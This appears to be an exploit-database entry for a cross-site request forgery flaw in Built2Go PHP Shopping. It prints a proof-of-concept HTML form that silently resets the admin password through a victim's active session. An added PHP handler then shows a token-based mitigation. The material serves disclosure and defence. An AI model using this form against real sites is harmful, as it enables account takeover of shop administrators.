
Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)

Author: AtT4CKxT3rR0r1ST
type: webapps
platform: php
port: 
date_added: 2014-01-08 
date_updated: 2015-12-17 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/64735/info

Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.

Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.

<form method="POST" name="form0" action="http://www.example.com/adminpanel/edit_admin.php">
<input type="hidden" name="userid" value="ADMIN"/>
<input type="hidden" name="pass" value="12121212"/>
<input type="hidden" name="retypepass" value="12121212"/>
<input type="hidden" name="addnew" value="1"/>
<input type="hidden" name="action" value="save"/>
<input type="hidden" name="new" value="Submit"/>
</form>
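
Mitigation sketch (added example, not code from Built2Go or from the advisory): the form above succeeds because the request carries nothing an attacker's page cannot supply. The handler below binds the password change to a per-session token and a SameSite session cookie. The field names userid, pass, retypepass and action come from the form above; the csrf_token field, the helper functions and the session layout are assumptions.

```php
<?php
declare(strict_types=1);

// Keep the session cookie out of cross-site requests (PHP 7.3+ array form).
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true, 'secure' => true]);
session_start();

// Issue one random token per session; the edit form embeds it as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
// $submitted is untyped on purpose: a crafted request can send an array.
function csrf_token_is_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] ?? '') === 'save') {
    // A form hosted on another origin cannot read the session token,
    // so the forged request shown in the advisory is rejected here.
    if (!csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    if (($_POST['pass'] ?? '') !== ($_POST['retypepass'] ?? '')) {
        http_response_code(400);
        exit('Passwords do not match');
    }
    // The application's existing password update would run at this point.
    exit('Password change accepted');
}

// Render the legitimate form with the token embedded.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="POST">'
   . '<input type="hidden" name="csrf_token" value="' . $token . '"/>'
   . '<input type="hidden" name="action" value="save"/>'
   . '<input type="text" name="userid"/>'
   . '<input type="password" name="pass"/>'
   . '<input type="password" name="retypepass"/>'
   . '<input type="submit" name="new" value="Submit"/>'
   . '</form>';
```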